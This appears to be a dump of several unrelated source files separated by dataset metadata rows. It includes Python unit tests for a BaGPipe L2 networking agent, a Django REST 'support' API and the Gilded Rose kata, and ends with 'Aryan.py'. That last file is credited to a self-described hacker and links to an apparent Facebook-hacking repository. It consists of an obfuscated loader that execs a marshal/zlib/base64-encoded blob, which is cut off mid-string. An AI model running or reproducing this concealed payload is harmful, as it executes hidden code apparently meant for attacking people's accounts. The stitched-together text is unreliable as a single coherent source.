base.BAGPIPE_L2_RT1)
def test_bagpipe_l2_attach_multiple_ports_same_network(self):
dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_port11 = base.DummyPort(base.NETWORK1, base.PORT11,
evpn=base.BAGPIPE_L2_RT1).__dict__
with mock.patch.object(self.agent,
'_send_attach_local_port') as send_attach_fn:
expected_calls = [
self._mock_send_expected_call(agent.EVPN,
dummy_port10,
self.DUMMY_VIF10),
self._mock_send_expected_call(agent.EVPN,
dummy_port11,
self.DUMMY_VIF11)
]
self.agent.bagpipe_port_attach(None, dummy_port10)
self.agent.bagpipe_port_attach(None, dummy_port11)
send_attach_fn.assert_has_calls(expected_calls)
self._check_network_info(base.NETWORK1['id'],
2,
agent.BAGPIPE_L2_SERVICE,
agent.EVPN,
base.BAGPIPE_L2_RT1)
def test_bagpipe_l2_attach_multiple_ports_different_networks(self):
dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_port20 = base.DummyPort(base.NETWORK2, base.PORT20,
evpn=base.BAGPIPE_L2_RT2).__dict__
with mock.patch.object(self.agent,
'_send_attach_local_port') as send_attach_fn:
expected_calls = [
self._mock_send_expected_call(agent.EVPN,
dummy_port10,
self.DUMMY_VIF10),
self._mock_send_expected_call(agent.EVPN,
dummy_port20,
self.DUMMY_VIF20)
]
self.agent.bagpipe_port_attach(None, dummy_port10)
self.agent.bagpipe_port_attach(None, dummy_port20)
send_attach_fn.assert_has_calls(expected_calls)
for network_id, evpn_rt in [
(base.NETWORK1['id'], base.BAGPIPE_L2_RT1),
(base.NETWORK2['id'], base.BAGPIPE_L2_RT2)]:
self._check_network_info(network_id,
1,
agent.BAGPIPE_L2_SERVICE,
agent.EVPN,
evpn_rt)
def test_bagpipe_l2_detach_single_port(self):
dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_detach10 = dict(id=base.PORT10['id'],
network_id=base.NETWORK1['id'])
with mock.patch.object(self.agent,
'_send_detach_local_port') as send_detach_fn:
expected_calls = [
self._mock_send_expected_call(agent.EVPN,
dummy_port10,
self.DUMMY_VIF10)
]
self.agent.bagpipe_port_attach(None, dummy_port10)
self.agent.bagpipe_port_detach(None, dummy_detach10)
send_detach_fn.assert_has_calls(expected_calls)
self._check_network_info(base.NETWORK1['id'], 0)
self.assertEqual(0, len(self.agent.networks_info),
"Registered attachments list must be empty: %s" %
self.agent.networks_info)
def test_bagpipe_l2_detach_multiple_ports_same_network(self):
dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_detach10 = dict(id=base.PORT10['id'],
network_id=base.NETWORK1['id'])
dummy_port11 = base.DummyPort(base.NETWORK1, base.PORT11,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_detach11 = dict(id=base.PORT11['id'],
network_id=base.NETWORK1['id'])
with mock.patch.object(self.agent,
'_send_detach_local_port') as send_detach_fn:
expected_calls = [
self._mock_send_expected_call(agent.EVPN,
dummy_port10,
self.DUMMY_VIF10),
self._mock_send_expected_call(agent.EVPN,
dummy_port11,
self.DUMMY_VIF11)
]
# Attach 2 ports on network 1
self.agent.bagpipe_port_attach(None, dummy_port10)
self.agent.bagpipe_port_attach(None, dummy_port11)
# Detach 1 port from network 1
self.agent.bagpipe_port_detach(None, dummy_detach10)
# Verify attachments list consistency
self._check_network_info(base.NETWORK1['id'],
1,
agent.BAGPIPE_L2_SERVICE,
agent.EVPN,
base.BAGPIPE_L2_RT1)
# Detach remaining port from network 1
self.agent.bagpipe_port_detach(None, dummy_detach11)
# Check if calls on BaGPipe BGP API are as expected
send_detach_fn.assert_has_calls(expected_calls)
# Verify attachments list consistency
self._check_network_info(base.NETWORK1['id'], 0)
self.assertEqual(0, len(self.agent.networks_info),
"Registered attachments list must be empty: %s" %
self.agent.networks_info)
def test_bagpipe_l2_detach_multiple_ports_different_networks(self):
dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_detach10 = dict(id=base.PORT10['id'],
network_id=base.NETWORK1['id'])
dummy_port11 = base.DummyPort(base.NETWORK1, base.PORT11,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_detach11 = dict(id=base.PORT11['id'],
network_id=base.NETWORK1['id'])
dummy_port20 = base.DummyPort(base.NETWORK2, base.PORT20,
evpn=base.BAGPIPE_L2_RT2).__dict__
dummy_detach20 = dict(id=base.PORT20['id'],
network_id=base.NETWORK2['id'])
dummy_port21 = base.DummyPort(base.NETWORK2, base.PORT21,
evpn=base.BAGPIPE_L2_RT2).__dict__
dummy_detach21 = dict(id=base.PORT21['id'],
network_id=base.NETWORK2['id'])
with mock.patch.object(self.agent,
'_send_detach_local_port') as send_detach_fn:
expected_calls = [
self._mock_send_expected_call(agent.EVPN,
dummy_port10,
self.DUMMY_VIF10),
self._mock_send_expected_call(agent.EVPN,
dummy_port20,
self.DUMMY_VIF20),
self._mock_send_expected_call(agent.EVPN,
dummy_port11,
self.DUMMY_VIF11),
self._mock_send_expected_call(agent.EVPN,
dummy_port21,
self.DUMMY_VIF21)
]
# Attach 2 ports on network 1
self.agent.bagpipe_port_attach(None, dummy_port10)
self.agent.bagpipe_port_attach(None, dummy_port11)
# Attach 2 ports on network 2
self.agent.bagpipe_port_attach(None, dummy_port20)
self.agent.bagpipe_port_attach(None, dummy_port21)
# Detach 1 port from each network
self.agent.bagpipe_port_detach(None, dummy_detach10)
self.agent.bagpipe_port_detach(None, dummy_detach20)
# Verify attachments list consistency
for network_id, evpn_rt in [
(base.NETWORK1['id'], base.BAGPIPE_L2_RT1),
(base.NETWORK2['id'], base.BAGPIPE_L2_RT2)]:
self._check_network_info(network_id,
1,
agent.BAGPIPE_L2_SERVICE,
agent.EVPN,
evpn_rt)
# Detach remaining port from each network
self.agent.bagpipe_port_detach(None, dummy_detach11)
self.agent.bagpipe_port_detach(None, dummy_detach21)
# Check if calls on BaGPipe BGP API are as expected
send_detach_fn.assert_has_calls(expected_calls)
# Verify attachments list consistency
for network_id in [base.NETWORK1['id'], base.NETWORK2['id']]:
self._check_network_info(network_id, 0)
self.assertEqual(0, len(self.agent.networks_info),
"Registered attachments list must be empty: %s" %
self.agent.networks_info)
class TestServiceBaGPipeL2LinuxBridge(
base.BaseTestBaGPipeBGPAgentLinuxBridge, TestServiceBaGPipeL2Mixin):
pass
| 45.719844
| 78
| 0.523489
| 1,165
| 11,750
| 4.930472
| 0.127039
| 0.048572
| 0.043001
| 0.066156
| 0.846971
| 0.827124
| 0.814067
| 0.782208
| 0.75
| 0.75
| 0
| 0.039286
| 0.408596
| 11,750
| 256
| 79
| 45.898438
| 0.787308
| 0.090468
| 0
| 0.816667
| 0
| 0
| 0.030303
| 0.012947
| 0
| 0
| 0
| 0
| 0.05
| 1
| 0.033333
| false
| 0.005556
| 0.016667
| 0
| 0.061111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6239a44b0aa5471a408d31ec09e5b677d54a8dc4
| 122
|
py
|
Python
|
py/jpy-integration/src/javaToPython/python/io/deephaven/jpy/integration/my_class.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 55
|
2021-05-11T16:01:59.000Z
|
2022-03-30T14:30:33.000Z
|
py/jpy-integration/src/javaToPython/python/io/deephaven/jpy/integration/my_class.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 943
|
2021-05-10T14:00:02.000Z
|
2022-03-31T21:28:15.000Z
|
py/jpy-integration/src/javaToPython/python/io/deephaven/jpy/integration/my_class.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 29
|
2021-05-10T11:33:16.000Z
|
2022-03-30T21:01:54.000Z
|
class MyClass:
def __init__(self):
pass
def plus43(self, x):
return x + 43
def echo(self, x):
return x
| 13.555556
| 22
| 0.598361
| 19
| 122
| 3.631579
| 0.578947
| 0.144928
| 0.318841
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046512
| 0.295082
| 122
| 9
| 23
| 13.555556
| 0.755814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0.142857
| 0
| 0.285714
| 0.857143
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 8
|
624301f30125d2ec95565452ea4af9cac27ed204
| 5,374
|
py
|
Python
|
api/tests/support_viewset_test.py
|
UnbFeelings/UnbFeelings_api
|
73c725113bc89ae4754a68f958eeaae6da85876e
|
[
"MIT"
] | 1
|
2018-03-18T21:06:00.000Z
|
2018-03-18T21:06:00.000Z
|
api/tests/support_viewset_test.py
|
UnbFeelings/UnbFeelings_api
|
73c725113bc89ae4754a68f958eeaae6da85876e
|
[
"MIT"
] | 42
|
2018-04-03T17:30:52.000Z
|
2021-06-10T19:44:04.000Z
|
api/tests/support_viewset_test.py
|
UnbFeelings/UnbFeelings_api
|
73c725113bc89ae4754a68f958eeaae6da85876e
|
[
"MIT"
] | 2
|
2018-04-08T00:57:50.000Z
|
2018-08-01T19:48:58.000Z
|
# -*- coding: utf-8 -*-
from rest_framework.test import APITestCase, APIClient
from django.contrib.auth import get_user_model
from api.models import Campus, Course, Subject, Support
from api.tests.helpers import create_test_user, TestCheckMixin
UserModel = get_user_model()
class SupportTestCase(APITestCase, TestCheckMixin):
@create_test_user(email="test@user.com", password="testuser")
@create_test_user(email="test2@user.com", password="testuser2")
def setUp(self):
self.user_sender = UserModel.objects.get(email="test@user.com")
self.user_receiver = UserModel.objects.get(email="test2@user.com")
def test_user_create_posts(self):
client = APIClient()
client.login(username='test@user.com', password='testuser')
user_sender_id = self.user_sender.id
user_receiver_id = self.user_receiver.id
data = {
"message": "#VoltaRonyCoins",
}
token = self._get_user_token("test@user.com", "testuser")
client.credentials(HTTP_AUTHORIZATION='JWT {}'.format(token))
response = client.post('/api/support/'+str(user_receiver_id)+'/', data)
self.assertEqual(201, response.status_code)
self.assertEqual(data["message"], response.data['message'])
self.assertEqual(user_sender_id, response.data['student_from'])
self.assertEqual(user_receiver_id, response.data['student_to'])
def test_get_supports_made_by_user(self):
client = APIClient()
client.login(username='test@user.com', password='testuser')
user_sender_id = self.user_sender.id
user_receiver_id = self.user_receiver.id
data = {
"message": "#VoltaRonyCoins",
}
token = self._get_user_token("test@user.com", "testuser")
client.credentials(HTTP_AUTHORIZATION='JWT {}'.format(token))
client.post('/api/support/'+str(user_receiver_id)+'/', data)
response = client.get('/api/support/from_student/', data)
self.assertEqual(200, response.status_code)
self.assertEqual(data["message"], response.data['results'][0]['message'])
self.assertEqual(user_sender_id, response.data['results'][0]['student_from'])
self.assertEqual(user_receiver_id, response.data['results'][0]['student_to'])
def test__get_supports_made_to_user(self):
client = APIClient()
client.login(username='test@user.com', password='testuser')
user_sender_id = self.user_sender.id
user_receiver_id = self.user_receiver.id
data = {
"message": "#VoltaRonyCoins",
}
token = self._get_user_token("test@user.com", "testuser")
client.credentials(HTTP_AUTHORIZATION='JWT {}'.format(token))
client.post('/api/support/'+str(user_receiver_id)+'/', data)
client.logout()
client = APIClient()
client.login(username='test2@user.com', password='testuser2')
token = self._get_user_token("test2@user.com", "testuser2")
client.credentials(HTTP_AUTHORIZATION='JWT {}'.format(token))
response = client.get('/api/support/to_student/', data)
self.assertEqual(200, response.status_code)
self.assertEqual(data["message"], response.data['results'][0]['message'])
self.assertEqual(user_sender_id, response.data['results'][0]['student_from'])
self.assertEqual(user_receiver_id, response.data['results'][0]['student_to'])
def test_get_none_supports_made_by_user(self):
client = APIClient()
client.login(username='test@user.com', password='testuser')
data = { }
token = self._get_user_token("test@user.com", "testuser")
client.credentials(HTTP_AUTHORIZATION='JWT {}'.format(token))
response = client.get('/api/support/from_student/', data)
self.assertEqual(200, response.status_code)
self.assertEqual(0, response.data['count'])
# self.assertEqual(user_sender_id, response.data['results'][0]['student_from'])
# self.assertEqual(user_receiver_id, response.data['results'][0]['student_to'])
def test_get_none_supports_made_to_user(self):
client = APIClient()
client.login(username='test@user.com', password='testuser')
data = { }
token = self._get_user_token("test@user.com", "testuser")
client.credentials(HTTP_AUTHORIZATION='JWT {}'.format(token))
response = client.get('/api/support/to_student/', data)
self.assertEqual(200, response.status_code)
self.assertEqual(0, response.data['count'])
def test_post_support_denied_permission(self):
client = APIClient()
user_receiver_id = self.user_receiver.id
data = { }
response = client.post('/api/support/'+str(user_receiver_id)+'/', data)
self.assertEqual(401, response.status_code)
def test_get_support_to_student_denied_permission(self):
client = APIClient()
data = { }
response = client.get('/api/support/to_student/', data)
self.assertEqual(401, response.status_code)
def test_get_support_from_student_denied_permission(self):
client = APIClient()
data = { }
response = client.get('/api/support/from_student/', data)
self.assertEqual(401, response.status_code)
| 32.569697
| 87
| 0.660216
| 631
| 5,374
| 5.391442
| 0.120444
| 0.092593
| 0.065844
| 0.042328
| 0.855085
| 0.803645
| 0.803645
| 0.79806
| 0.767784
| 0.736038
| 0
| 0.00977
| 0.200037
| 5,374
| 165
| 88
| 32.569697
| 0.781577
| 0.032936
| 0
| 0.701031
| 0
| 0
| 0.153061
| 0.028879
| 0
| 0
| 0
| 0
| 0.195876
| 1
| 0.092784
| false
| 0.082474
| 0.041237
| 0
| 0.14433
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
65af156d49c5aab0fb0bad3d260136faea3f555b
| 3,402
|
py
|
Python
|
python/test_gilded_rose.py
|
ChristelleJolly/kata-clean-code-gilded-rose
|
b0518612893c1c06d2f6f375771d9ac2f1d6efa2
|
[
"MIT"
] | null | null | null |
python/test_gilded_rose.py
|
ChristelleJolly/kata-clean-code-gilded-rose
|
b0518612893c1c06d2f6f375771d9ac2f1d6efa2
|
[
"MIT"
] | null | null | null |
python/test_gilded_rose.py
|
ChristelleJolly/kata-clean-code-gilded-rose
|
b0518612893c1c06d2f6f375771d9ac2f1d6efa2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest
from gilded_rose import Item, GildedRose
class GildedRoseTest(unittest.TestCase):
def test_item_name_doesnt_change(self):
items = [Item("foo", 0, 0)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertEqual("foo", items[0].name)
def test_sell_in_lowers_by_1_for_standard_item(self):
items = [Item("foo", 15, 0)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertEqual(14, items[0].sell_in)
def test_quality_lowers_by_1_for_standard_item(self):
items = [Item("foo", 15, 10)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertEqual(9, items[0].quality)
def test_quality_lowers_by_2_when_date_passed_for_standard_item(self):
items = [Item("foo", 0, 10)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertEqual(8, items[0].quality)
def test_quality_is_never_negative(self):
items = [Item("foo", 0, 0)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertGreaterEqual(items[0].quality, 0)
def test_aged_brie_quality_increases_by_1(self):
items = [Item("Aged Brie", 15, 10)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertEqual(11, items[0].quality)
def test_quality_is_never_more_than_fifty(self):
items = [Item("Aged Brie", 15, 50)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertGreaterEqual(50, items[0].quality)
def test_sulfuras_sell_in_never_change(self):
items = [Item("Sulfuras, Hand of Ragnaros", 15, 80)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertEqual(15, items[0].sell_in)
def test_sulfuras_quality_never_change(self):
items = [Item("Sulfuras, Hand of Ragnaros", 15, 80)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertEqual(80, items[0].quality)
def test_backstage_passes_quality_increase_by_1_when_more_than_10_days_left(self):
items = [Item("Backstage passes to a TAFKAL80ETC concert", 15, 10)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertEqual(11, items[0].quality)
def test_backstage_passes_quality_increase_by_2_when_10_to_6_days_left(self):
items = [Item("Backstage passes to a TAFKAL80ETC concert", 10, 10)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
gilded_rose.update_quality()
self.assertEqual(14, items[0].quality)
def test_backstage_passes_quality_increase_by_3_when_less_than_6_days_left(self):
items = [Item("Backstage passes to a TAFKAL80ETC concert", 5, 10)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
gilded_rose.update_quality()
self.assertEqual(16, items[0].quality)
def test_backstage_passes_quality_drops_to_0_when_date_passed(self):
items = [Item("Backstage passes to a TAFKAL80ETC concert", 0, 10)]
gilded_rose = GildedRose(items)
gilded_rose.update_quality()
self.assertEqual(0, items[0].quality)
if __name__ == '__main__':
unittest.main()
| 36.978261
| 86
| 0.679894
| 443
| 3,402
| 4.875847
| 0.167043
| 0.134259
| 0.111111
| 0.159722
| 0.829167
| 0.812963
| 0.765278
| 0.750926
| 0.709259
| 0.681944
| 0
| 0.037453
| 0.215168
| 3,402
| 91
| 87
| 37.384615
| 0.771536
| 0.006173
| 0
| 0.472222
| 0
| 0
| 0.076946
| 0
| 0
| 0
| 0
| 0
| 0.180556
| 1
| 0.180556
| false
| 0.125
| 0.027778
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
65dcca96f24b6939a6fbd8cdf771bbd3f8aa9814
| 11,887
|
py
|
Python
|
Aryan.py
|
Aryanjan002/Aryan_fbhack1
|
0223a85bfca11bee0dca681f873d9bcd23eec074
|
[
"Apache-2.0"
] | null | null | null |
Aryan.py
|
Aryanjan002/Aryan_fbhack1
|
0223a85bfca11bee0dca681f873d9bcd23eec074
|
[
"Apache-2.0"
] | null | null | null |
Aryan.py
|
Aryanjan002/Aryan_fbhack1
|
0223a85bfca11bee0dca681f873d9bcd23eec074
|
[
"Apache-2.0"
] | null | null | null |
# Compile By Aryan_Hacker
# YouTube ARYAN_HACK
# https://github.com/Aryanjan002/Aryan_fchack1
# telegram t.me/Aryan jan
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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